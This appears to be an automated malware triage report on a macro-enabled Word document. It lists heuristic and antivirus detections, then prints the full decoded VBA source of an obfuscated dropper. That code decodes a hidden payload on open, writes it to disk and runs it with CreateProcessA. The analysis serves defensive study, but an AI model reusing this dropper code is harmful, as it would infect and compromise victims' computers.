MALICIOUS
Risk Score: 180
Malware Insights
MITRE ATT&CK: T1566.001 Spearphishing Attachment, T1059.005 Visual Basic
The file is an OOXML document containing VBA macros, indicated by multiple heuristic firings including 'OOXML_VBA' and 'OLE_VBA_DOCOPEN'. The 'SE_ENABLE_LURE' heuristic confirms the document uses a common social engineering tactic to prompt users to enable macros. The presence of a 'Document_Open' macro and the embedded 'macros.bas' file suggest the macro is designed to execute automatically upon opening. While the specific payload is obfuscated, the overall pattern points to a macro-based downloader.
Heuristics (7)
- ClamAV: Doc.Malware.Chronos-6897935-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings): Document contains a VBA project — VBA macros present
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched line in script:
  Private Sub Document_Open()
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access). Matched line in script:
  PvX3zQ = Environ(QrFEsQkYiLQQAPH5m(Chr(219) + Chr(66) + Chr(219) + Chr(241) + Chr(50) + Chr(33) + Chr(251), "FuPYSBMbAMyl06")) & "\" & D8ZjcrKSss7p & QrFEsQkYiLQQAPH5m(Chr(176) + Chr(123) + Chr(181) + Chr(225), "VpQkgaR3pAPah8Qs0")
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15540 bytes |

SHA-256: 38fa880645d67c99b9dc0908b09603986fab77df6d669e2ca0751d47cb95242f
Detection (ClamAV): No threats found
Obfuscation or payload: likely. 103 of 192 identifiers look randomly generated (e.g. 'QrFEsQkYiLQQAPH5m') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Type BLgfcWX8d
Mz3YgO7olo2Sy As Long
W8vcTEQ As Long
JIBGjSn072DotS As Long
O7DeBFUA2AEbxui As Long
End Type
Private Type OpdfSoHDmMP
BsEO As Long
VVsP09cPdW1MzwQ5C As String
RtRPA As String
Bu4kumDGm6GZiJq As String
C0wP9bcG8mUY As Long
IkszXKoo93 As Long
EIM As Long
W53MS02MDCSx As Long
KEBMQMYf As Long
PJG5pQo7vVmQ As Long
MhDqMoxij5qgtoJK As Long
W3w6lTevZN As Long
XRac As Integer
TN0SX As Integer
IGd6sGPm48koFZUvB As Long
YSEGq4hD9J8Vl3MYZ As Long
RlSxC1tNxrk As Long
LgNA6Ws6Ua8 As Long
End Type
Private Declare Function CreateProcessA Lib "kernel32" (ByVal Jqo3L6pjDHqWFxZDo As String, ByVal WcK1u53rDFgJKS As String, S5ZE1YSewSxk As Any, Tj4Xc6wNFS4Tnf As Any, ByVal YY6v5s7C6JC As Long, ByVal LmEpLKaiTUUaX As Long, IHUm8XOjqPmPQ3qT As Any, ByVal X0mfsJf32vvR7M0 As String, DGPylg52hP As OpdfSoHDmMP, Myx8qwIMdbk As BLgfcWX8d) As Long
Private Declare Sub RtlMoveMemory Lib "kernel32" (GWbWC49Q07B As Any, GacLduerKK As Any, ByVal YdaWVria As Long)
Private HYNWr(0 To 255) As Integer
Private Declare Function CloseHandle Lib "kernel32" (ByVal Sz2xwu83uu As Long) As Long
Private Dkshp1FFo92uB As String
Private P7WstS5hL(0 To 63) As Byte
Private GiYgpVz5v(0 To 255) As Byte
Private GuZMMyAan As Boolean
Private Declare Sub UFnLW Lib "kernel32" Alias "RtlMoveMemory" (ByVal J2lCyXXa3HI As Long, ByVal PxdFfjCOS1yK8p As Long, ByVal Tjyhoys6 As Long)
Function UxXGMFFdwyP7pRk5(Xv9qmKwlOC As String) As String
If Xv9qmKwlOC = "" Then Exit Function
UxXGMFFdwyP7pRk5 = StrConv(XHknVHvwXhDo5g(Xv9qmKwlOC), vbUnicode)
End Function
Function XONkRxkhajmi() As String
XONkRxkhajmi = UxXGMFFdwyP7pRk5(UserForm1.TextBox1.Text)
End Function
Private Property Let GIngIj(UEtgdiuRR9k As String)
Dim OocXc7pkejkBsUUBQ As Long, Jc0Cu As Long, YX1OCG8D7R6 As Byte, Hwybkj3i6S() As Byte, JMMNuI8m As Long
If (Dkshp1FFo92uB = UEtgdiuRR9k) Then Exit Property
Dkshp1FFo92uB = UEtgdiuRR9k
Hwybkj3i6S() = StrConv(Dkshp1FFo92uB, vbFromUnicode)
JMMNuI8m = Len(Dkshp1FFo92uB)
For OocXc7pkejkBsUUBQ = 0 To 255
HYNWr(OocXc7pkejkBsUUBQ) = OocXc7pkejkBsUUBQ
Next OocXc7pkejkBsUUBQ
For OocXc7pkejkBsUUBQ = 0 To 255
Jc0Cu = (Jc0Cu + HYNWr(OocXc7pkejkBsUUBQ) + Hwybkj3i6S(OocXc7pkejkBsUUBQ Mod JMMNuI8m)) Mod 256
YX1OCG8D7R6 = HYNWr(OocXc7pkejkBsUUBQ)
HYNWr(OocXc7pkejkBsUUBQ) = HYNWr(Jc0Cu)
HYNWr(Jc0Cu) = YX1OCG8D7R6
Next
End Property
Function XHknVHvwXhDo5g(KE9PIayTd5JECN4t As String) As Byte()
If Not GuZMMyAan Then Fgdb0o125mc8
Dim XDVlXF() As Byte, MpA20nXUb() As Byte, Olap33hpNJU() As Byte, Mrujx7QsimCmSLQ As Long, RvviwemJp2Q5 As Long
XDVlXF = KE9PIayTd5JECN4t
ReDim MpA20nXUb(LBound(XDVlXF) To (UBound(XDVlXF) * 2)) As Byte
RvviwemJp2Q5 = LBound(MpA20nXUb)
For Mrujx7QsimCmSLQ = LBound(XDVlXF) To UBound(XDVlXF)
XDVlXF(Mrujx7QsimCmSLQ) = GiYgpVz5v(XDVlXF(Mrujx7QsimCmSLQ))
Next Mrujx7QsimCmSLQ
For Mrujx7QsimCmSLQ = LBound(XDVlXF) To (UBound(XDVlXF) - ((UBound(XDVlXF) Mod 8) + 8)) Step 8
MpA20nXUb(RvviwemJp2Q5) = (XDVlXF(Mrujx7QsimCmSLQ) * 4) + (XDVlXF(Mrujx7QsimCmSLQ + 2) \ 16)
MpA20nXUb(RvviwemJp2Q5 + 1) = ((XDVlXF(Mrujx7QsimCmSLQ + 2) And 15) * 16) + (XDVlXF(Mrujx7QsimCmSLQ + 4) \ 4)
MpA20nXUb(RvviwemJp2Q5 + 2) = ((XDVlXF(Mrujx7QsimCmSLQ + 4) And 3) * 64) + XDVlXF(Mrujx7QsimCmSLQ + 6)
RvviwemJp2Q5 = RvviwemJp2Q5 + 3
Next Mrujx7QsimCmSLQ
Select Case (UBound(XDVlXF) Mod 8)
Case 3
MpA20nXUb(RvviwemJp2Q5) = (XDVlXF(Mrujx7QsimCmSLQ) * 4) + (XDVlXF(Mrujx7QsimCmSLQ + 2) \ 16)
Case 5:
MpA20nXUb(RvviwemJp2Q5) = (XDVlXF(Mrujx7QsimCmSLQ) * 4) + (XDVlXF(Mrujx7QsimCmSLQ + 2) \ 16)
MpA20nXUb(RvviwemJp2Q5 + 1) = ((XDVlXF(Mrujx7QsimCmSLQ + 2) And 15) * 16) + (XDVlXF(Mrujx7QsimCmSLQ + 4) \ 4)
RvviwemJp2Q5 = RvviwemJp2Q5 + 1
Case 7
MpA20nXUb(RvviwemJp2Q5) = (XDVlXF(Mrujx7QsimCmSLQ) * 4) + (XDVlXF(Mrujx7QsimCmSLQ + 2) \ 16)
MpA20nXUb(RvviwemJp2Q5 + 1) = ((XDVlXF(Mrujx7QsimCmSLQ + 2) And 15) * 16) + (XDVlXF(Mrujx7QsimCmSLQ + 4) \ 4)
MpA20nXUb(RvviwemJp2Q5 + 2) = ((XDVlXF(Mrujx7QsimCmSLQ + 4) And 3) * 64) + XDVlXF(Mrujx7QsimCmSLQ + 6)
RvviwemJp2Q5 = RvviwemJp2Q5 + 2
End Select
ReDim Olap33hpNJU(LBound(MpA20nXUb) To RvviwemJp2Q5) As Byte
If LBound(MpA20nXUb) = 0 Then RvviwemJp2Q5 = RvviwemJp2Q5 + 1
UFnLW VarPtr(Olap33hpNJU(LBound(Olap33hpNJU))), VarPtr(MpA20nXUb(LBound(MpA20nXUb))), RvviwemJp2Q5
XHknVHvwXhDo5g = Olap33hpNJU
End Function
Function QrFEsQkYiLQQAPH5m(KgdthEHG3otZw As String, XSUzQEeP7j4ED7H As String) As String
Dim byteArray() As Byte
byteArray() = StrConv(KgdthEHG3otZw, vbFromUnicode)
KvRrQ6C1rRyp byteArray(), XSUzQEeP7j4ED7H
QrFEsQkYiLQQAPH5m = StrConv(byteArray(), vbUnicode)
End Function
Sub Ofjrujx7(WvoWVFB As Long)
Dim AvTyXFul5Ag As Long, GOyZGOK6HbD570Vx As Long
AvTyXFul5Ag = 55
GOyZGOK6HbD570Vx = 9
If AvTyXFul5Ag + GOyZGOK6HbD570Vx > 4 Then
GOyZGOK6HbD570Vx = AvTyXFul5Ag + 73
Else
MsgBox 7
End If
Dim M02fF3DPZ6dN1dfYt As Long
Dim VxREqIVmCQl As Long, JIE3XNn3vr8vq As Long
VxREqIVmCQl = 90
JIE3XNn3vr8vq = 55
If VxREqIVmCQl + JIE3XNn3vr8vq > 4 Then
JIE3XNn3vr8vq = VxREqIVmCQl + 33
Else
MsgBox 73
End If
M02fF3DPZ6dN1dfYt = Timer + WvoWVFB
Do While Timer < M02fF3DPZ6dN1dfYt
DoEvents
Loop
Dim XhQOSlRMRXSVa As Long, DAchMA3MkYWyLy4DA As Long
XhQOSlRMRXSVa = 57
DAchMA3MkYWyLy4DA = 27
If XhQOSlRMRXSVa + DAchMA3MkYWyLy4DA > 4 Then
DAchMA3MkYWyLy4DA = XhQOSlRMRXSVa + 92
Else
MsgBox 96
End If
End Sub
Private Function D8ZjcrKSss7p(Optional FACrr As String = "0123456789") As String
Dim Sn3vr8vqqQAD9N3Y As Long, FwVxIdwHpSxm3u As Long
Sn3vr8vqqQAD9N3Y = 51
FwVxIdwHpSxm3u = 74
If Sn3vr8vqqQAD9N3Y + FwVxIdwHpSxm3u > 4 Then
FwVxIdwHpSxm3u = Sn3vr8vqqQAD9N3Y + 51
Else
MsgBox 46
End If
Dim EM848Jk250D0G() As Byte, TDm00hNHF6pF() As Byte, XUU7Gv6o2i As Long, FCCkIpH3qm As Long, RTQJHny As Long, BlMJYNFl As String
Dim T1cvaU As Long, Qvd7rI1gLrV As Long
T1cvaU = 54
Qvd7rI1gLrV = 64
If T1cvaU + Qvd7rI1gLrV > 4 Then
Qvd7rI1gLrV = T1cvaU + 80
Else
MsgBox 60
End If
RTQJHny = 0
Dim KelHcAG As Long, TdvZ2e9n1K6fU As Long
KelHcAG = 51
TdvZ2e9n1K6fU = 97
If KelHcAG + TdvZ2e9n1K6fU > 4 Then
TdvZ2e9n1K6fU = KelHcAG + 32
Else
MsgBox 55
End If
V1QfCh7ZaUdLfYpwd:
Dim PBLoYs7 As Long, YzkdaH1MC0s As Long
PBLoYs7 = 8
YzkdaH1MC0s = 28
If PBLoYs7 + YzkdaH1MC0s > 4 Then
YzkdaH1MC0s = PBLoYs7 + 68
Else
MsgBox 93
End If
Randomize
BlMJYNFl = Int(30 * Rnd)
If BlMJYNFl < 4 Then GoTo V1QfCh7ZaUdLfYpwd
RTQJHny = BlMJYNFl
If RTQJHny > 0& Then
Dim UHKcKGMmXc1n As Long, PN47LZi9 As Long
UHKcKGMmXc1n = 65
PN47LZi9 = 28
If UHKcKGMmXc1n + PN47LZi9 > 4 Then
PN47LZi9 = UHKcKGMmXc1n + 40
Else
MsgBox 77
End If
Randomize
EM848Jk250D0G = FACrr
Dim Im9TdLF As Long, R9cHpb8Mz1MC0s As Long
Im9TdLF = 72
R9cHpb8Mz1MC0s = 81
If Im9TdLF + R9cHpb8Mz1MC0s > 4 Then
R9cHpb8Mz1MC0s = Im9TdLF + 8
Else
MsgBox 28
End If
XUU7Gv6o2i = Len(FACrr) - 1&
RTQJHny = (RTQJHny * 2&) - 1&
Dim DyeeHOIGYicQMjW99 As Long, WJi2tcT0udgI As Long
DyeeHOIGYicQMjW99 = 28
WJi2tcT0udgI = 16
If DyeeHOIGYicQMjW99 + WJi2tcT0udgI > 4 Then
WJi2tcT0udgI = DyeeHOIGYicQMjW99 + 51
Else
MsgBox 45
End If
ReDim TDm00hNHF6pF(RTQJHny) As Byte
For FCCkIpH3qm = 0& To RTQJHny Step 2&
TDm00hNHF6pF(FCCkIpH3qm) = EM848Jk250D0G(CLng(XUU7Gv6o2i * Rnd) * 2&)
Next
Dim M8sZsC9Tkdu As Long, G27tzcU4 As Long
M8sZsC9Tkdu = 5
G27tzcU4 = 37
If M8sZsC9Tkdu + G27tzcU4 > 4 Then
G27tzcU4 = M8sZsC9Tkdu + 39
Else
MsgBox 80
End If
End If
Dim W183ACG2W21udOkTt As Long, TtFUv4PXLL As Long
W183ACG2W21udOkTt = 62
TtFUv4PXLL = 38
If W183ACG2W21udOkTt + TtFUv4PXLL > 4 Then
TtFUv4PXLL = W183ACG2W21udOkTt + 12
Else
MsgBox 64
End If
D8ZjcrKSss7p = TDm00hNHF6pF
Dim FUnT As Long, PHOopy As Long
FUnT = 74
PHOopy = 74
If FUnT + PHOopy > 4 Then
PHOopy = FUnT + 27
Else
MsgBox 44
End If
End Function
Private Sub Document_Open()
On Error Resume Next
Dim AvVXl4UTWa9nrvN As Long, TzWVkbnhP78kQLPd As Long
AvVXl4UTWa9nrvN = 16
TzWVkbnhP78kQLPd = 6
If AvVXl4UTWa9nrvN + TzWVkbnhP78kQLPd > 4 Then
TzWVkbnhP78kQLPd = AvVXl4UTWa9nrvN + 62
Else
MsgBox 65
End If
Dim PvX3zQ As String
Dim RXSKWvWI As Long, Q3FBJmNF As Long
RXSKWvWI = 53
Q3FBJmNF = 17
If RXSKWvWI + Q3FBJmNF > 4 Then
Q3FBJmNF = RXSKWvWI + 73
Else
MsgBox 4
End If
Dim Dol7gUshh15xa As Long, NRHJ3qgW As Long, UZ0NRrD4bs As Long, LyByTS6ztk As Integer
Dim AyMMu1Gix As Long, AE6eKCUx5K8l As Long
AyMMu1Gix = 50
AE6eKCUx5K8l = 26
If AyMMu1Gix + AE6eKCUx5K8l > 4 Then
AE6eKCUx5K8l = AyMMu1Gix + 44
Else
MsgBox 89
End If
Dol7gUshh15xa = 100000000: NRHJ3qgW = 0: UZ0NRrD4bs = 0
Dim Ja2OCPPC As Long, YIKkAOjAnhYXS As Long
Ja2OCPPC = 81
YIKkAOjAnhYXS = 6
If Ja2OCPPC + YIKkAOjAnhYXS > 4 Then
YIKkAOjAnhYXS = Ja2OCPPC + 59
Else
MsgBox 97
End If
For NRHJ3qgW = 1 To Dol7gUshh15xa
UZ0NRrD4bs = UZ0NRrD4bs + 1
Next NRHJ3qgW
Dim EO6Q5KMP4Gs As Long, IIz8D1NH As Long
EO6Q5KMP4Gs = 7
IIz8D1NH = 29
If EO6Q5KMP4Gs + IIz8D1NH > 4 Then
IIz8D1NH = EO6Q5KMP4Gs + 17
Else
MsgBox 52
End If
If UZ0NRrD4bs = Dol7gUshh15xa Then
Dim KguXYT As Long, QE7oY6XbGOKY As Long
KguXYT = 64
QE7oY6XbGOKY = 57
If KguXYT + QE7oY6XbGOKY > 4 Then
QE7oY6XbGOKY = KguXYT + 79
Else
MsgBox 12
End If
PvX3zQ = Environ(QrFEsQkYiLQQAPH5m(Chr(219) + Chr(66) + Chr(219) + Chr(241) + Chr(50) + Chr(33) + Chr(251), "FuPYSBMbAMyl06")) & "\" & D8ZjcrKSss7p & QrFEsQkYiLQQAPH5m(Chr(176) + Chr(123) + Chr(181) + Chr(225), "VpQkgaR3pAPah8Qs0")
Dim HiIxELltL As Long, TPyHYWr9aBjOyB As Long
HiIxELltL = 29
TPyHYWr9aBjOyB = 62
If HiIxELltL + TPyHYWr9aBjOyB > 4 Then
TPyHYWr9aBjOyB = HiIxELltL + 36
Else
MsgBox 43
End If
LyByTS6ztk = FreeFile
Open PvX3zQ For Binary Access Write As #LyByTS6ztk
Put #LyByTS6ztk, , XONkRxkhajmi
Close #LyByTS6ztk
Ofjrujx7 1
JWui3lpTWZHHrTz PvX3zQ
ActiveDocument.Range.Text = QrFEsQkYiLQQAPH5m(Chr(214) + Chr(15) + Chr(34), "CQKO5pemF")
End If
Dim CtHZmZsTJMh As Long, BWLLV As Long
CtHZmZsTJMh = 46
BWLLV = 12
If CtHZmZsTJMh + BWLLV > 4 Then
BWLLV = CtHZmZsTJMh + 16
Else
MsgBox 55
End If
End Sub
Sub KvRrQ6C1rRyp(L79Bvi00YVG() As Byte, Optional ATmIkOQnut5 As String)
Dim Ynkg9vPP As Long, Xsr As Long, DAKTexFlX6vO As Byte, BozNB4V3E As Long, TfzA4Ax4DTU7Xqp7 As Long, HMQMYf2EqPdZ As Long, KK2VmQ(0 To 255) As Integer
If (Len(ATmIkOQnut5) > 0) Then GIngIj = ATmIkOQnut5
RtlMoveMemory KK2VmQ(0), HYNWr(0), 512
TfzA4Ax4DTU7Xqp7 = UBound(L79Bvi00YVG) + 1
HMQMYf2EqPdZ = TfzA4Ax4DTU7Xqp7
For BozNB4V3E = 0 To (TfzA4Ax4DTU7Xqp7 - 1)
Ynkg9vPP = (Ynkg9vPP + 1) Mod 256
Xsr = (Xsr + KK2VmQ(Ynkg9vPP)) Mod 256
DAKTexFlX6vO = KK2VmQ(Ynkg9vPP)
KK2VmQ(Ynkg9vPP) = KK2VmQ(Xsr)
KK2VmQ(Xsr) = DAKTexFlX6vO
L79Bvi00YVG(BozNB4V3E) = L79Bvi00YVG(BozNB4V3E) Xor (KK2VmQ((KK2VmQ(Ynkg9vPP) + KK2VmQ(Xsr)) Mod 256))
Next
End Sub
Sub Fgdb0o125mc8()
P7WstS5hL(0) = 65
P7WstS5hL(1) = 66
P7WstS5hL(2) = 67
P7WstS5hL(3) = 68
P7WstS5hL(4) = 69
P7WstS5hL(5) = 70
P7WstS5hL(6) = 71
P7WstS5hL(7) = 72
P7WstS5hL(8) = 73
P7WstS5hL(9) = 74
P7WstS5hL(10) = 75
P7WstS5hL(11) = 76
P7WstS5hL(12) = 77
P7WstS5hL(13) = 78
P7WstS5hL(14) = 79
P7WstS5hL(15) = 80
P7WstS5hL(16) = 81
P7WstS5hL(17) = 82
P7WstS5hL(18) = 83
P7WstS5hL(19) = 84
P7WstS5hL(20) = 85
P7WstS5hL(21) = 86
P7WstS5hL(22) = 87
P7WstS5hL(23) = 88
P7WstS5hL(24) = 89
P7WstS5hL(25) = 90
P7WstS5hL(26) = 97
P7WstS5hL(27) = 98
P7WstS5hL(28) = 99
P7WstS5hL(29) = 100
P7WstS5hL(30) = 101
P7WstS5hL(31) = 102
P7WstS5hL(32) = 103
P7WstS5hL(33) = 104
P7WstS5hL(34) = 105
P7WstS5hL(35) = 106
P7WstS5hL(36) = 107
P7WstS5hL(37) = 108
P7WstS5hL(38) = 109
P7WstS5hL(39) = 110
P7WstS5hL(40) = 111
P7WstS5hL(41) = 112
P7WstS5hL(42) = 113
P7WstS5hL(43) = 114
P7WstS5hL(44) = 115
P7WstS5hL(45) = 116
P7WstS5hL(46) = 117
P7WstS5hL(47) = 118
P7WstS5hL(48) = 119
P7WstS5hL(49) = 120
P7WstS5hL(50) = 121
P7WstS5hL(51) = 122
P7WstS5hL(52) = 48
P7WstS5hL(53) = 49
P7WstS5hL(54) = 50
P7WstS5hL(55) = 51
P7WstS5hL(56) = 52
P7WstS5hL(57) = 53
P7WstS5hL(58) = 54
P7WstS5hL(59) = 55
P7WstS5hL(60) = 56
P7WstS5hL(61) = 57
P7WstS5hL(62) = 43
P7WstS5hL(63) = 47
GiYgpVz5v(65) = 0
GiYgpVz5v(66) = 1
GiYgpVz5v(67) = 2
GiYgpVz5v(68) = 3
GiYgpVz5v(69) = 4
GiYgpVz5v(70) = 5
GiYgpVz5v(71) = 6
GiYgpVz5v(72) = 7
GiYgpVz5v(73) = 8
GiYgpVz5v(74) = 9
GiYgpVz5v(75) = 10
GiYgpVz5v(76) = 11
GiYgpVz5v(77) = 12
GiYgpVz5v(78) = 13
GiYgpVz5v(79) = 14
GiYgpVz5v(80) = 15
GiYgpVz5v(81) = 16
GiYgpVz5v(82) = 17
GiYgpVz5v(83) = 18
GiYgpVz5v(84) = 19
GiYgpVz5v(85) = 20
GiYgpVz5v(86) = 21
GiYgpVz5v(87) = 22
GiYgpVz5v(88) = 23
GiYgpVz5v(89) = 24
GiYgpVz5v(90) = 25
GiYgpVz5v(97) = 26
GiYgpVz5v(98) = 27
GiYgpVz5v(99) = 28
GiYgpVz5v(100) = 29
GiYgpVz5v(101) = 30
GiYgpVz5v(102) = 31
GiYgpVz5v(103) = 32
GiYgpVz5v(104) = 33
GiYgpVz5v(105) = 34
GiYgpVz5v(106) = 35
GiYgpVz5v(107) = 36
GiYgpVz5v(108) = 37
GiYgpVz5v(109) = 38
GiYgpVz5v(110) = 39
GiYgpVz5v(111) = 40
GiYgpVz5v(112) = 41
GiYgpVz5v(113) = 42
GiYgpVz5v(114) = 43
GiYgpVz5v(115) = 44
GiYgpVz5v(116) = 45
GiYgpVz5v(117) = 46
GiYgpVz5v(118) = 47
GiYgpVz5v(119) = 48
GiYgpVz5v(120) = 49
GiYgpVz5v(121) = 50
GiYgpVz5v(122) = 51
GiYgpVz5v(48) = 52
GiYgpVz5v(49) = 53
GiYgpVz5v(50) = 54
GiYgpVz5v(51) = 55
GiYgpVz5v(52) = 56
GiYgpVz5v(53) = 57
GiYgpVz5v(54) = 58
GiYgpVz5v(55) = 59
GiYgpVz5v(56) = 60
GiYgpVz5v(57) = 61
GiYgpVz5v(43) = 62
GiYgpVz5v(47) = 63
End Sub
Private Function JWui3lpTWZHHrTz(Sxj9Jl As String)
Dim PVvu7UH9z As Long, CcXHJKxIZ0 As Long
PVvu7UH9z = 40
CcXHJKxIZ0 = 31
If PVvu7UH9z + CcXHJKxIZ0 > 4 Then
CcXHJKxIZ0 = PVvu7UH9z + 32
Else
MsgBox 29
End If
Dim YEXhx6MAzKCOZ9l As BLgfcWX8d, XwxjEg9BwXceDl As OpdfSoHDmMP, GORVOMiM As String
Dim V39C0tiVJTCN6bhYi As Long, IXBXZY3O As Long
V39C0tiVJTCN6bhYi = 68
IXBXZY3O = 20
If V39C0tiVJTCN6bhYi + IXBXZY3O > 4 Then
IXBXZY3O = V39C0tiVJTCN6bhYi + 18
Else
MsgBox 49
End If
XwxjEg9BwXceDl.BsEO = Len(XwxjEg9BwXceDl)
Dim Xiv1Gu0fZluuZqj As Long, BKiW8VZz9 As Long
Xiv1Gu0fZluuZqj = 32
BKiW8VZz9 = 76
If Xiv1Gu0fZluuZqj + BKiW8VZz9 > 4 Then
BKiW8VZz9 = Xiv1Gu0fZluuZqj + 45
Else
MsgBox 65
End If
CreateProcessA GORVOMiM, Sxj9Jl, ByVal 0&, ByVal 0&, 1&, &H20&, ByVal 0&, GORVOMiM, XwxjEg9BwXceDl, YEXhx6MAzKCOZ9l
Dim Xt8leWDhmIC4tb As Long, CiA928YPw As Long
Xt8leWDhmIC4tb = 77
CiA928YPw = 66
If Xt8leWDhmIC4tb + CiA928YPw > 4 Then
CiA928YPw = Xt8leWDhmIC4tb + 2
Else
MsgBox 95
End If
CloseHandle YEXhx6MAzKCOZ9l.W8vcTEQ
Dim FmdOmUxD2kT4aGy As Long, Keo4yVaxYpGCufP0z As Long
FmdOmUxD2kT4aGy = 69
Keo4yVaxYpGCufP0z = 64
If FmdOmUxD2kT4aGy + Keo4yVaxYpGCufP0z > 4 Then
Keo4yVaxYpGCufP0z = FmdOmUxD2kT4aGy + 8
Else
MsgBox 50
End If
CloseHandle YEXhx6MAzKCOZ9l.Mz3YgO7olo2Sy
Dim HQTC4IJdAwHtA8 As Long, UICmO As Long
HQTC4IJdAwHtA8 = 39
UICmO = 29
If HQTC4IJdAwHtA8 + UICmO > 4 Then
UICmO = HQTC4IJdAwHtA8 + 85
Else
MsgBox 16
End If
End Function
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{53A9968D-EC8A-426E-9B2F-BB1C657FBB58}{832D7A7A-95E3-45C1-B0DC-219EE761750A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 281088 bytes |

SHA-256: dbae12add99c90437b24e2337bb84ed1bdeb3fdea3fda08d4f6ecf258ecc3706
Detection (ClamAV): Doc.Malware.Chronos-6897935-0
Obfuscation or payload: likely. 2621 of 4575 identifiers look randomly generated (e.g. 'ngEAAAAAAJ6eAQAAAAAA6J0BANidAQDCnQEAtJ0B'); 17 string-concatenation chain(s) — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).